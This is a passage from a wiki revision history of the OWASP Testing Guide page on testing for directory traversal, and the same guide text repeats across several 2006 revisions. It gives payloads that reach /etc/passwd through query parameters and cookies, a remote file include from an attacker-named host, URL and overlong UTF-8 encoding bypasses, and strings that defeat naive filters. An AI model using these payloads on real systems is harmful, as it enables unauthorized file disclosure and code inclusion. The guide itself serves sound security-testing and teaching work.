Additionally, reviewing the source code, it is possible to analyze the functions that are supposed to handle invalid input: some developers try to massage invalid input to make it valid, avoiding warnings and errors. This functions are usually prone to security flaws.

Considering a web application with these instructions:
<pre>
filename = Request.QueryString(“file”);
Replace(filename, “/”,”\”);
Replace(filename, “..\”,””);
</pre>

An aggressor could exploit the flaw, as in following example:
<pre>
file=....//....//boot.ini
file=....\\....\\boot.ini
file= ..\..\boot.ini
</pre>
 

== References ==
* Security Risks of Unicode
http://www.schneier.com/crypto-gram-0007.html[http://www.schneier.com/crypto-gram-0007.html]
* phpBB Attachment Mod Directory Traversal HTTP POST Injection
http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0290.html[http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0290.html]
== Tools ==
* Web Proxy (''Burp Suite''[http://portswigger.net], ''Paros''[http://www.parosproxy.org/index.shtml], ''WebScarab''[http://www.owasp.org/index.php/OWASP_WebScarab_Project], ''Suru Web Proxy''[http://www.sensepost.com/research/suru/])
* Enconding/Decoding tools
* String searcher (''grep''[http://www.gnu.org/software/grep/], your favorite text editor)
 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]

Testing for Directory Traversal

2006-11-06T13:00:16Z

Ikkisoft: /* Black Box testing and example */

{{Template:OWASP Testing Guide v2}}

== Brief Summary ==
Nowadays, many web applications use and manage files. Using input validation methods not well designed, an aggressor could exploit the system in order to read/write files that are not intended to be accessible; in particular situations it could be possible to execute arbitrary code or system commands.
 

== Description of the Issue ==
Usually, web servers and web applications implement authentication mechanisms in order to control the access to files and resources.
Web servers try to confine users' files inside a "root directory" or "web document root" which represents a physical directory on the file system; users have just to consider this directory as the base directory into the hierarchical structure of the web application.
The definition of the privileges is made using ''Access Control Lists'' (ACL) that identify which users and groups are supposed to be able to access, modify or execute a specific file on the server.
These mechanisms are designed to prevent the access to sensible files from malicious users (example: the common ''/etc/passwd'' into Unix-like platform) or to avoid the execution of system commands.

Many web applications use server-side scripts to include different kinds of files: is quite common to use this method to manage graphics templates, load static texts, and so on. Unfortunately, these applications show security issues if the input parameters used (form parameters, cookies values, ...) are not well validated.

In web servers and web applications too, this kind of problem arises in directory traversal/file include attacks; exploiting this kind of vulnerability an attacker is able read directory and files which normally he/she couldn't read, access data outside the web document root, include scripts and other kinds of files from external websites.

For the purpose of the OWASP Testing Guide, we will just consider the security threats related to web applications and not to web server (as the infamous "%5c escape code" into Microsoft IIS web server). We will provide further reading, in the references section, for the interested readers.

This kind of attack is also know as the '''dot-dot-slash''' attack (../), '''path traversal''', '''directory climbing''', '''backtracking'''.

During an assessment, in order to discover directory traversal and file include flaws, we need to perform two different stages:
* ('''a''') '''Input Vectors Enumeration''' (a systematical evaluation of each input vector)
* ('''b''') '''Exploiting Techniques''' (a methodical evaluation of each attack technique used by an aggressor to exploit the vulnerability)
 

== Black Box testing and example ==
('''a''') '''Input Vectors Enumeration''' 
As others unvalidated input vulnerabilities, in which an aggressor exploit the insufficient ''validation''/''sanitization'' process, also for the directory traversal flaw is necessary to consider each parameter whose value is provided by the users: form parameters (GET/POST), values inside cookies, values stored into databases from previous client-server interactions, others HTTP header parameters.

Examples of checks to be performed at this stage include:

* Do you notice some parameters which you could recognize as file related into HTTP requests?
* Strange file extension?
* Curious variable name?
<pre>
http://example.com/getUserProfile.jsp?item=ikki.html
http://example.com/index.php?file=content
http://example.com/main.cgi?home=index.htm
</pre>

* Is it possible to identify cookies used by the web application for the dynamic generation of pages/templates?

<pre>
Cookie: ID=d9ccd3f4f9f18cc1:TM=2166255468:LM=1162655568:S=3cFpqbJgMSSPKVMV:TEMPLATE=flower
Cookie: USER=1826cc8f:PSTYLE=GreenDotRed
</pre>
 

('''b''') '''Exploit Techniques'''

As next step, during the assessment, we need to analyze the different attack techniques used by an aggressor in order to evaluate the input validation functions present into the web application.

Using the previous examples:

The dynamic page called ''getUserProfile.jsp'' is used to load static informations from a file, showing the content to users. An attacker could insert the malicious string "''../../../../etc/passwd''" to include the password hash file of a Linux/Unix system.
Obviously this kind of attack is possible only if the validation checkpoint fails; according to the filesystem privileges, the web application itself must be able to read the file.

To exploit this flaw, an aggressor needs some knowledge on where to blindly find any default files and directories on the system: guessing and trying again until the attack works is usually an easy way to perform a directory climbing.

<pre>
http://example.com/getUserProfile.jsp?item=../../../../etc/passwd
</pre>

For the cookies example, we have:
<pre>
Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd
</pre>

It's also possible to include files (''scripts too!'') located on external website. Let's see:
<pre>
http://example.com/index.php?file=http://www.attackerwebsite.com/malicioustxt
</pre>

The following example will demonstrate how is it possible to show the source code of a CGI component, without using any path traversal chars.
<pre>
http://example.com/main.cgi?home=main.cgi
</pre>

The component called "''main.cgi''" is located into the same directory of the normal HTML static files used by the application.
Sometimes, when the attackers are not so lucky, they need to use special chars (like the "'''.'''" dot, "'''%00'''" null, ...) in order to bypass file extension controls and/or stop the script execution.

It's also very important to notice that when developers implement an input validation function sometimes they don't consider every possible chars encoding.
During a Black Box Test is useful to try to inject every kind of chars encoding and also every kind of path definition.

Each operating system use different chars as path separator:

''Unix-like os'':
<pre>
"/" root directory
"/" directory separator
</pre>

''Windows os'':
<pre>
"<drive letter>:\" root directory
"\" but also "/" directory separator
</pre>
(Usually on Win, the directory traversal attack is limited to a single partition)

''Classic Mac os'':
<pre>
"<drive letter>:" root directory
":" directory separator
</pre>
 
We should take in account the following chars encoding:

* URL encoding e double URL encoding

<pre>
%2e%2e%2f represents ../
%2e%2e/ represents ../
..%2f represents ../
%2e%2e%5c represents ..\
%2e%2e\ represents ..\
..%5c represents ..\
%252e%252e%255c represents ..\
..%255c represents ..\ and so on.
</pre>

* Unicode/UTF-8 Encoding (It just works in systems which are able to accept overlong UTF-8 sequences)

<pre>
..%c0%af represents ../
..%c1%9c represents ..\
</pre>
 

== Gray Box testing and example ==
When the analysis is performed with a White Box approach, we have to follow the same methodology as in the Black Box Testing. However, since we can review the source code is possible to search the input vectors (''stage ('''a''') of the testing'') more easily and accurately.
During a source code review we can use simple tools (as the ''grep'' command) to search one or more common patterns into the application code: inclusion functions/methods, filesystem operations and so on.

<pre>
PHP: include(), include_once(), require(), require_once(), fopen(), readfile(), ...
JSP/Servlet: java.io.File(), java.io.FileReader(), ...
ASP: include file, include virtual, ...
</pre>

Using online code search engines (Google CodeSearch[http://www.google.com/codesearch], Koders[http://www.koders.com/]) is also possible to find directory traversal flaws into OpenSource software published on Internet.

For PHP, we can use:
<pre>
lang:php (include|require)(_once)?\s*['"(]?\s*\$_(GET|POST|COOKIE)
</pre>
 
During a Gray Box Testing is usually possible to discover vulnerabilities that are impossible (''or very difficult!'') to find performing a Black Box assessment.

Some web applications generate dynamic pages using values and parameters stored into a database; if an attacker could insert crafted directory traversal strings when the application saves the data, probably it will occurs a sort of "indirect" directory traversal attack. This kind of security problems is difficult to find because the parameters inside the inclusion functions seem internal and "safe" but otherwise they are not.

Additionally, reviewing the source code, it is possible to analyze the functions that are supposed to handle invalid input: some developers try to massage invalid input to make it valid, avoiding warnings and errors. This functions are usually prone to security flaws.

Considering a web application with these instructions:
<pre>
filename = Request.QueryString(“file”);
Replace(filename, “/”,”\”);
Replace(filename, “..\”,””);
</pre>

An aggressor could exploit the flaw, as in following example:
<pre>
file=....//....//boot.ini
file=....\\....\\boot.ini
file= ..\..\boot.ini
</pre>
 

== References ==
* Security Risks of Unicode
http://www.schneier.com/crypto-gram-0007.html[http://www.schneier.com/crypto-gram-0007.html]
* phpBB Attachment Mod Directory Traversal HTTP POST Injection
http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0290.html[http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0290.html]
== Tools ==
* Web Proxy (''Burp Suite''[http://portswigger.net], ''Paros''[http://www.parosproxy.org/index.shtml], ''WebScarab''[http://www.owasp.org/index.php/OWASP_WebScarab_Project], ''Suru Web Proxy''[http://www.sensepost.com/research/suru/])
* Enconding/Decoding tools
* String searcher (''grep''[http://www.gnu.org/software/grep/], your favorite text editor)
 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]

Testing for Directory Traversal

2006-11-06T12:59:19Z

Ikkisoft: /* Description of the Issue */

{{Template:OWASP Testing Guide v2}}

== Brief Summary ==
Nowadays, many web applications use and manage files. Using input validation methods not well designed, an aggressor could exploit the system in order to read/write files that are not intended to be accessible; in particular situations it could be possible to execute arbitrary code or system commands.
 

== Description of the Issue ==
Usually, web servers and web applications implement authentication mechanisms in order to control the access to files and resources.
Web servers try to confine users' files inside a "root directory" or "web document root" which represents a physical directory on the file system; users have just to consider this directory as the base directory into the hierarchical structure of the web application.
The definition of the privileges is made using ''Access Control Lists'' (ACL) that identify which users and groups are supposed to be able to access, modify or execute a specific file on the server.
These mechanisms are designed to prevent the access to sensible files from malicious users (example: the common ''/etc/passwd'' into Unix-like platform) or to avoid the execution of system commands.

Many web applications use server-side scripts to include different kinds of files: is quite common to use this method to manage graphics templates, load static texts, and so on. Unfortunately, these applications show security issues if the input parameters used (form parameters, cookies values, ...) are not well validated.

In web servers and web applications too, this kind of problem arises in directory traversal/file include attacks; exploiting this kind of vulnerability an attacker is able read directory and files which normally he/she couldn't read, access data outside the web document root, include scripts and other kinds of files from external websites.

For the purpose of the OWASP Testing Guide, we will just consider the security threats related to web applications and not to web server (as the infamous "%5c escape code" into Microsoft IIS web server). We will provide further reading, in the references section, for the interested readers.

This kind of attack is also know as the '''dot-dot-slash''' attack (../), '''path traversal''', '''directory climbing''', '''backtracking'''.

During an assessment, in order to discover directory traversal and file include flaws, we need to perform two different stages:
* ('''a''') '''Input Vectors Enumeration''' (a systematical evaluation of each input vector)
* ('''b''') '''Exploiting Techniques''' (a methodical evaluation of each attack technique used by an aggressor to exploit the vulnerability)
 

== Black Box testing and example ==
('''a''') '''Input Vectors Enumeration''' 
As others unvalidated input vulnerabilities, in which an aggressor exploit the insufficient ''validation''/''sanitization'' process, also for the directory traversal is necessary to consider each parameter whose value is provided by the users: form parameters (GET/POST), values inside cookies, values stored into databases from previous client-server interactions, others HTTP header parameters.

Examples of checks to be performed at this stage include:

* Do you notice some parameters which you could recognize as file related into HTTP requests?
* Strange file extension?
* Curious variable name?
<pre>
http://example.com/getUserProfile.jsp?item=ikki.html
http://example.com/index.php?file=content
http://example.com/main.cgi?home=index.htm
</pre>

* Is it possible to identify cookies used by the web application for the dynamic generation of pages/templates?

<pre>
Cookie: ID=d9ccd3f4f9f18cc1:TM=2166255468:LM=1162655568:S=3cFpqbJgMSSPKVMV:TEMPLATE=flower
Cookie: USER=1826cc8f:PSTYLE=GreenDotRed
</pre>
 

('''b''') '''Exploit Techniques'''

As next step, during the assessment, we need to analyze the different attack techniques used by an aggressor in order to evaluate the input validation functions present into the web application.

Using the previous examples:

The dynamic page called ''getUserProfile.jsp'' is used to load static informations from a file, showing the content to users. An attacker could insert the malicious string "''../../../../etc/passwd''" to include the password hash file of a Linux/Unix system.
Obviously this kind of attack is possible only if the validation checkpoint fails; according to the filesystem privileges, the web application itself must be able to read the file.

To exploit this flaw, an aggressor needs some knowledge on where to blindly find any default files and directories on the system: guessing and trying again until the attack works is usually an easy way to perform a directory climbing.

<pre>
http://example.com/getUserProfile.jsp?item=../../../../etc/passwd
</pre>

For the cookies example, we have:
<pre>
Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd
</pre>

It's also possible to include files (''scripts too!'') located on external website. Let's see:
<pre>
http://example.com/index.php?file=http://www.attackerwebsite.com/malicioustxt
</pre>

The following example will demonstrate how is it possible to show the source code of a CGI component, without using any path traversal chars.
<pre>
http://example.com/main.cgi?home=main.cgi
</pre>

The component called "''main.cgi''" is located into the same directory of the normal HTML static files used by the application.
Sometimes, when the attackers are not so lucky, they need to use special chars (like the "'''.'''" dot, "'''%00'''" null, ...) in order to bypass file extension controls and/or stop the script execution.

It's also very important to notice that when developers implement an input validation function sometimes they don't consider every possible chars encoding.
During a Black Box Test is useful to try to inject every kind of chars encoding and also every kind of path definition.

Each operating system use different chars as path separator:

''Unix-like os'':
<pre>
"/" root directory
"/" directory separator
</pre>

''Windows os'':
<pre>
"<drive letter>:\" root directory
"\" but also "/" directory separator
</pre>
(Usually on Win, the directory traversal attack is limited to a single partition)

''Classic Mac os'':
<pre>
"<drive letter>:" root directory
":" directory separator
</pre>
 
We should take in account the following chars encoding:

* URL encoding e double URL encoding

<pre>
%2e%2e%2f represents ../
%2e%2e/ represents ../
..%2f represents ../
%2e%2e%5c represents ..\
%2e%2e\ represents ..\
..%5c represents ..\
%252e%252e%255c represents ..\
..%255c represents ..\ and so on.
</pre>

* Unicode/UTF-8 Encoding (It just works in systems which are able to accept overlong UTF-8 sequences)

<pre>
..%c0%af represents ../
..%c1%9c represents ..\
</pre>
 

== Gray Box testing and example ==
When the analysis is performed with a White Box approach, we have to follow the same methodology as in the Black Box Testing. However, since we can review the source code is possible to search the input vectors (''stage ('''a''') of the testing'') more easily and accurately.
During a source code review we can use simple tools (as the ''grep'' command) to search one or more common patterns into the application code: inclusion functions/methods, filesystem operations and so on.

<pre>
PHP: include(), include_once(), require(), require_once(), fopen(), readfile(), ...
JSP/Servlet: java.io.File(), java.io.FileReader(), ...
ASP: include file, include virtual, ...
</pre>

Using online code search engines (Google CodeSearch[http://www.google.com/codesearch], Koders[http://www.koders.com/]) is also possible to find directory traversal flaws into OpenSource software published on Internet.

For PHP, we can use:
<pre>
lang:php (include|require)(_once)?\s*['"(]?\s*\$_(GET|POST|COOKIE)
</pre>
 
During a Gray Box Testing is usually possible to discover vulnerabilities that are impossible (''or very difficult!'') to find performing a Black Box assessment.

Some web applications generate dynamic pages using values and parameters stored into a database; if an attacker could insert crafted directory traversal strings when the application saves the data, probably it will occurs a sort of "indirect" directory traversal attack. This kind of security problems is difficult to find because the parameters inside the inclusion functions seem internal and "safe" but otherwise they are not.

Additionally, reviewing the source code, it is possible to analyze the functions that are supposed to handle invalid input: some developers try to massage invalid input to make it valid, avoiding warnings and errors. This functions are usually prone to security flaws.

Considering a web application with these instructions:
<pre>
filename = Request.QueryString(“file”);
Replace(filename, “/”,”\”);
Replace(filename, “..\”,””);
</pre>

An aggressor could exploit the flaw, as in following example:
<pre>
file=....//....//boot.ini
file=....\\....\\boot.ini
file= ..\..\boot.ini
</pre>
 

== References ==
* Security Risks of Unicode
http://www.schneier.com/crypto-gram-0007.html[http://www.schneier.com/crypto-gram-0007.html]
* phpBB Attachment Mod Directory Traversal HTTP POST Injection
http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0290.html[http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0290.html]
== Tools ==
* Web Proxy (''Burp Suite''[http://portswigger.net], ''Paros''[http://www.parosproxy.org/index.shtml], ''WebScarab''[http://www.owasp.org/index.php/OWASP_WebScarab_Project], ''Suru Web Proxy''[http://www.sensepost.com/research/suru/])
* Enconding/Decoding tools
* String searcher (''grep''[http://www.gnu.org/software/grep/], your favorite text editor)
 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]

Testing for Directory Traversal

2006-11-06T10:02:02Z

Ikkisoft: /* References */

{{Template:OWASP Testing Guide v2}}

== Brief Summary ==
Nowadays, many web applications use and manage files. Using input validation methods not well designed, an aggressor could exploit the system in order to read/write files that are not intended to be accessible; in particular situations it could be possible to execute arbitrary code or system commands.
 

== Description of the Issue ==
Usually, web servers and web applications implement authentication mechanisms in order to control the access to files and resources.
Web servers try to confine users' files inside a "root directory" or "web document root" which represents a physical directory on the file system; users have just to consider this directory as the base directory into the hierarchical structure of the web application.
The definition of the privileges is made using ''Access Control Lists'' (ACL) that identify which users and groups are supposed to be able to access, modify or execute a specific file on the server.
These mechanisms are designed to prevent the access to sensible files from malicious users (example: the common ''/etc/passwd'' into Unix-like platform) or to avoid the execution of system commands.

Many web applications use server-side scripts to include different kinds of files: is quite common to use this method to manage graphics templates, load static texts, and so on. Unfortunately, these applications show security issues if the input parameters used (form parameters, cookies values, ...) are not well validated.

In web servers and web applications too, this kind of problem arises in directory traversal/file include attacks; exploiting this kind of vulnerability an attacker is able read directory and files which normally he/she couldn't read, access data outside the web document root, include scripts and other kinds of files from external websites.

For the purpose of the OWASP Testing Guide, we will just consider the security threats related to web applications and not to web server (as the infamous "%5c escape code" into Microsoft IIS web server). We will provide further reading, in the references section, for the interested readers.

This kind of attack is also know as the '''dot-dot-slash''' attack (../), '''path traversal''', '''directory climbing''', '''backtracking'''.

During an assessment, in order to discover directory traversal and file include flaws, we need to perform two different stages:
* ('''a''') '''Input Vectors Enumeration''' (a systematical evaluation of each input vector)
* ('''b''') '''Exploiting Techniques''' (a methodical evaluation of each attack technique used by an aggressor to exploit the vulnerability).
 

== Black Box testing and example ==
('''a''') '''Input Vectors Enumeration''' 
As others unvalidated input vulnerabilities, in which an aggressor exploit the insufficient ''validation''/''sanitization'' process, also for the directory traversal is necessary to consider each parameter whose value is provided by the users: form parameters (GET/POST), values inside cookies, values stored into databases from previous client-server interactions, others HTTP header parameters.

Examples of checks to be performed at this stage include:

* Do you notice some parameters which you could recognize as file related into HTTP requests?
* Strange file extension?
* Curious variable name?
<pre>
http://example.com/getUserProfile.jsp?item=ikki.html
http://example.com/index.php?file=content
http://example.com/main.cgi?home=index.htm
</pre>

* Is it possible to identify cookies used by the web application for the dynamic generation of pages/templates?

<pre>
Cookie: ID=d9ccd3f4f9f18cc1:TM=2166255468:LM=1162655568:S=3cFpqbJgMSSPKVMV:TEMPLATE=flower
Cookie: USER=1826cc8f:PSTYLE=GreenDotRed
</pre>
 

('''b''') '''Exploit Techniques'''

As next step, during the assessment, we need to analyze the different attack techniques used by an aggressor in order to evaluate the input validation functions present into the web application.

Using the previous examples:

The dynamic page called ''getUserProfile.jsp'' is used to load static informations from a file, showing the content to users. An attacker could insert the malicious string "''../../../../etc/passwd''" to include the password hash file of a Linux/Unix system.
Obviously this kind of attack is possible only if the validation checkpoint fails; according to the filesystem privileges, the web application itself must be able to read the file.

To exploit this flaw, an aggressor needs some knowledge on where to blindly find any default files and directories on the system: guessing and trying again until the attack works is usually an easy way to perform a directory climbing.

<pre>
http://example.com/getUserProfile.jsp?item=../../../../etc/passwd
</pre>

For the cookies example, we have:
<pre>
Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd
</pre>

It's also possible to include files (''scripts too!'') located on external website. Let's see:
<pre>
http://example.com/index.php?file=http://www.attackerwebsite.com/malicioustxt
</pre>

The following example will demonstrate how is it possible to show the source code of a CGI component, without using any path traversal chars.
<pre>
http://example.com/main.cgi?home=main.cgi
</pre>

The component called "''main.cgi''" is located into the same directory of the normal HTML static files used by the application.
Sometimes, when the attackers are not so lucky, they need to use special chars (like the "'''.'''" dot, "'''%00'''" null, ...) in order to bypass file extension controls and/or stop the script execution.

It's also very important to notice that when developers implement an input validation function sometimes they don't consider every possible chars encoding.
During a Black Box Test is useful to try to inject every kind of chars encoding and also every kind of path definition.

Each operating system use different chars as path separator:

''Unix-like os'':
<pre>
"/" root directory
"/" directory separator
</pre>

''Windows os'':
<pre>
"<drive letter>:\" root directory
"\" but also "/" directory separator
</pre>
(Usually on Win, the directory traversal attack is limited to a single partition)

''Classic Mac os'':
<pre>
"<drive letter>:" root directory
":" directory separator
</pre>
 
We should take in account the following chars encoding:

* URL encoding e double URL encoding

<pre>
%2e%2e%2f represents ../
%2e%2e/ represents ../
..%2f represents ../
%2e%2e%5c represents ..\
%2e%2e\ represents ..\
..%5c represents ..\
%252e%252e%255c represents ..\
..%255c represents ..\ and so on.
</pre>

* Unicode/UTF-8 Encoding (It just works in systems which are able to accept overlong UTF-8 sequences)

<pre>
..%c0%af represents ../
..%c1%9c represents ..\
</pre>
 

== Gray Box testing and example ==
When the analysis is performed with a White Box approach, we have to follow the same methodology as in the Black Box Testing. However, since we can review the source code is possible to search the input vectors (''stage ('''a''') of the testing'') more easily and accurately.
During a source code review we can use simple tools (as the ''grep'' command) to search one or more common patterns into the application code: inclusion functions/methods, filesystem operations and so on.

<pre>
PHP: include(), include_once(), require(), require_once(), fopen(), readfile(), ...
JSP/Servlet: java.io.File(), java.io.FileReader(), ...
ASP: include file, include virtual, ...
</pre>

Using online code search engines (Google CodeSearch[http://www.google.com/codesearch], Koders[http://www.koders.com/]) is also possible to find directory traversal flaws into OpenSource software published on Internet.

For PHP, we can use:
<pre>
lang:php (include|require)(_once)?\s*['"(]?\s*\$_(GET|POST|COOKIE)
</pre>
 
During a Gray Box Testing is usually possible to discover vulnerabilities that are impossible (''or very difficult!'') to find performing a Black Box assessment.

Some web applications generate dynamic pages using values and parameters stored into a database; if an attacker could insert crafted directory traversal strings when the application saves the data, probably it will occurs a sort of "indirect" directory traversal attack. This kind of security problems is difficult to find because the parameters inside the inclusion functions seem internal and "safe" but otherwise they are not.

Additionally, reviewing the source code, it is possible to analyze the functions that are supposed to handle invalid input: some developers try to massage invalid input to make it valid, avoiding warnings and errors. This functions are usually prone to security flaws.

Considering a web application with these instructions:
<pre>
filename = Request.QueryString(“file”);
Replace(filename, “/”,”\”);
Replace(filename, “..\”,””);
</pre>

An aggressor could exploit the flaw, as in following example:
<pre>
file=....//....//boot.ini
file=....\\....\\boot.ini
file= ..\..\boot.ini
</pre>
 

== References ==
* Security Risks of Unicode
http://www.schneier.com/crypto-gram-0007.html[http://www.schneier.com/crypto-gram-0007.html]
* phpBB Attachment Mod Directory Traversal HTTP POST Injection
http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0290.html[http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0290.html]
== Tools ==
* Web Proxy (''Burp Suite''[http://portswigger.net], ''Paros''[http://www.parosproxy.org/index.shtml], ''WebScarab''[http://www.owasp.org/index.php/OWASP_WebScarab_Project], ''Suru Web Proxy''[http://www.sensepost.com/research/suru/])
* Enconding/Decoding tools
* String searcher (''grep''[http://www.gnu.org/software/grep/], your favorite text editor)
 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]

Testing for Directory Traversal

2006-11-06T09:58:49Z

Ikkisoft: /* References */

{{Template:OWASP Testing Guide v2}}

== Brief Summary ==
Nowadays, many web applications use and manage files. Using input validation methods not well designed, an aggressor could exploit the system in order to read/write files that are not intended to be accessible; in particular situations it could be possible to execute arbitrary code or system commands.
 

== Description of the Issue ==
Usually, web servers and web applications implement authentication mechanisms in order to control the access to files and resources.
Web servers try to confine users' files inside a "root directory" or "web document root" which represents a physical directory on the file system; users have just to consider this directory as the base directory into the hierarchical structure of the web application.
The definition of the privileges is made using ''Access Control Lists'' (ACL) that identify which users and groups are supposed to be able to access, modify or execute a specific file on the server.
These mechanisms are designed to prevent the access to sensible files from malicious users (example: the common ''/etc/passwd'' into Unix-like platform) or to avoid the execution of system commands.

Many web applications use server-side scripts to include different kinds of files: is quite common to use this method to manage graphics templates, load static texts, and so on. Unfortunately, these applications show security issues if the input parameters used (form parameters, cookies values, ...) are not well validated.

In web servers and web applications too, this kind of problem arises in directory traversal/file include attacks; exploiting this kind of vulnerability an attacker is able read directory and files which normally he/she couldn't read, access data outside the web document root, include scripts and other kinds of files from external websites.

For the purpose of the OWASP Testing Guide, we will just consider the security threats related to web applications and not to web server (as the infamous "%5c escape code" into Microsoft IIS web server). We will provide further reading, in the references section, for the interested readers.

This kind of attack is also know as the '''dot-dot-slash''' attack (../), '''path traversal''', '''directory climbing''', '''backtracking'''.

During an assessment, in order to discover directory traversal and file include flaws, we need to perform two different stages:
* ('''a''') '''Input Vectors Enumeration''' (a systematical evaluation of each input vector)
* ('''b''') '''Exploiting Techniques''' (a methodical evaluation of each attack technique used by an aggressor to exploit the vulnerability).
 

== Black Box testing and example ==
('''a''') '''Input Vectors Enumeration''' 
As others unvalidated input vulnerabilities, in which an aggressor exploit the insufficient ''validation''/''sanitization'' process, also for the directory traversal is necessary to consider each parameter whose value is provided by the users: form parameters (GET/POST), values inside cookies, values stored into databases from previous client-server interactions, others HTTP header parameters.

Examples of checks to be performed at this stage include:

* Do you notice some parameters which you could recognize as file related into HTTP requests?
* Strange file extension?
* Curious variable name?
<pre>
http://example.com/getUserProfile.jsp?item=ikki.html
http://example.com/index.php?file=content
http://example.com/main.cgi?home=index.htm
</pre>

* Is it possible to identify cookies used by the web application for the dynamic generation of pages/templates?

<pre>
Cookie: ID=d9ccd3f4f9f18cc1:TM=2166255468:LM=1162655568:S=3cFpqbJgMSSPKVMV:TEMPLATE=flower
Cookie: USER=1826cc8f:PSTYLE=GreenDotRed
</pre>
 

('''b''') '''Exploit Techniques'''

As next step, during the assessment, we need to analyze the different attack techniques used by an aggressor in order to evaluate the input validation functions present into the web application.

Using the previous examples:

The dynamic page called ''getUserProfile.jsp'' is used to load static informations from a file, showing the content to users. An attacker could insert the malicious string "''../../../../etc/passwd''" to include the password hash file of a Linux/Unix system.
Obviously this kind of attack is possible only if the validation checkpoint fails; according to the filesystem privileges, the web application itself must be able to read the file.

To exploit this flaw, an aggressor needs some knowledge on where to blindly find any default files and directories on the system: guessing and trying again until the attack works is usually an easy way to perform a directory climbing.

<pre>
http://example.com/getUserProfile.jsp?item=../../../../etc/passwd
</pre>

For the cookies example, we have:
<pre>
Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd
</pre>

It's also possible to include files (''scripts too!'') located on external website. Let's see:
<pre>
http://example.com/index.php?file=http://www.attackerwebsite.com/malicioustxt
</pre>

The following example will demonstrate how is it possible to show the source code of a CGI component, without using any path traversal chars.
<pre>
http://example.com/main.cgi?home=main.cgi
</pre>

The component called "''main.cgi''" is located into the same directory of the normal HTML static files used by the application.
Sometimes, when the attackers are not so lucky, they need to use special chars (like the "'''.'''" dot, "'''%00'''" null, ...) in order to bypass file extension controls and/or stop the script execution.

It's also very important to notice that when developers implement an input validation function sometimes they don't consider every possible chars encoding.
During a Black Box Test is useful to try to inject every kind of chars encoding and also every kind of path definition.

Each operating system use different chars as path separator:

''Unix-like os'':
<pre>
"/" root directory
"/" directory separator
</pre>

''Windows os'':
<pre>
"<drive letter>:\" root directory
"\" but also "/" directory separator
</pre>
(Usually on Win, the directory traversal attack is limited to a single partition)

''Classic Mac os'':
<pre>
"<drive letter>:" root directory
":" directory separator
</pre>
 
We should take in account the following chars encoding:

* URL encoding e double URL encoding

<pre>
%2e%2e%2f represents ../
%2e%2e/ represents ../
..%2f represents ../
%2e%2e%5c represents ..\
%2e%2e\ represents ..\
..%5c represents ..\
%252e%252e%255c represents ..\
..%255c represents ..\ and so on.
</pre>

* Unicode/UTF-8 Encoding (It just works in systems which are able to accept overlong UTF-8 sequences)

<pre>
..%c0%af represents ../
..%c1%9c represents ..\
</pre>
 

== Gray Box testing and example ==
When the analysis is performed with a White Box approach, we have to follow the same methodology as in the Black Box Testing. However, since we can review the source code is possible to search the input vectors (''stage ('''a''') of the testing'') more easily and accurately.
During a source code review we can use simple tools (as the ''grep'' command) to search one or more common patterns into the application code: inclusion functions/methods, filesystem operations and so on.

<pre>
PHP: include(), include_once(), require(), require_once(), fopen(), readfile(), ...
JSP/Servlet: java.io.File(), java.io.FileReader(), ...
ASP: include file, include virtual, ...
</pre>

Using online code search engines (Google CodeSearch[http://www.google.com/codesearch], Koders[http://www.koders.com/]) is also possible to find directory traversal flaws into OpenSource software published on Internet.

For PHP, we can use:
<pre>
lang:php (include|require)(_once)?\s*['"(]?\s*\$_(GET|POST|COOKIE)
</pre>
 
During a Gray Box Testing is usually possible to discover vulnerabilities that are impossible (''or very difficult!'') to find performing a Black Box assessment.

Some web applications generate dynamic pages using values and parameters stored into a database; if an attacker could insert crafted directory traversal strings when the application saves the data, probably it will occurs a sort of "indirect" directory traversal attack. This kind of security problems is difficult to find because the parameters inside the inclusion functions seem internal and "safe" but otherwise they are not.

Additionally, reviewing the source code, it is possible to analyze the functions that are supposed to handle invalid input: some developers try to massage invalid input to make it valid, avoiding warnings and errors. This functions are usually prone to security flaws.

Considering a web application with these instructions:
<pre>
filename = Request.QueryString(“file”);
Replace(filename, “/”,”\”);
Replace(filename, “..\”,””);
</pre>

An aggressor could exploit the flaw, as in following example:
<pre>
file=....//....//boot.ini
file=....\\....\\boot.ini
file= ..\..\boot.ini
</pre>
 

== References ==
* Security Risks of Unicode[http://www.schneier.com/crypto-gram-0007.html]
* phpBB Attachment Mod Directory Traversal HTTP POST Injection[http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0290.html]
'''Tools''' 
* Web Proxy (''Burp Suite''[http://portswigger.net], ''Paros''[http://www.parosproxy.org/index.shtml], ''WebScarab''[http://www.owasp.org/index.php/OWASP_WebScarab_Project], ''Suru Web Proxy''[http://www.sensepost.com/research/suru/])
* Enconding/Decoding tools
* String searcher (''grep''[http://www.gnu.org/software/grep/], your favorite text editor)
 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for Directory Traversal

2006-11-06T09:53:46Z

Ikkisoft: /* Black Box testing and example */

{{Template:OWASP Testing Guide v2}}

== Brief Summary ==
Nowadays, many web applications use and manage files. Using input validation methods not well designed, an aggressor could exploit the system in order to read/write files that are not intended to be accessible; in particular situations it could be possible to execute arbitrary code or system commands.
 

== Description of the Issue ==
Usually, web servers and web applications implement authentication mechanisms in order to control the access to files and resources.
Web servers try to confine users' files inside a "root directory" or "web document root" which represents a physical directory on the file system; users have just to consider this directory as the base directory into the hierarchical structure of the web application.
The definition of the privileges is made using ''Access Control Lists'' (ACL) that identify which users and groups are supposed to be able to access, modify or execute a specific file on the server.
These mechanisms are designed to prevent the access to sensible files from malicious users (example: the common ''/etc/passwd'' into Unix-like platform) or to avoid the execution of system commands.

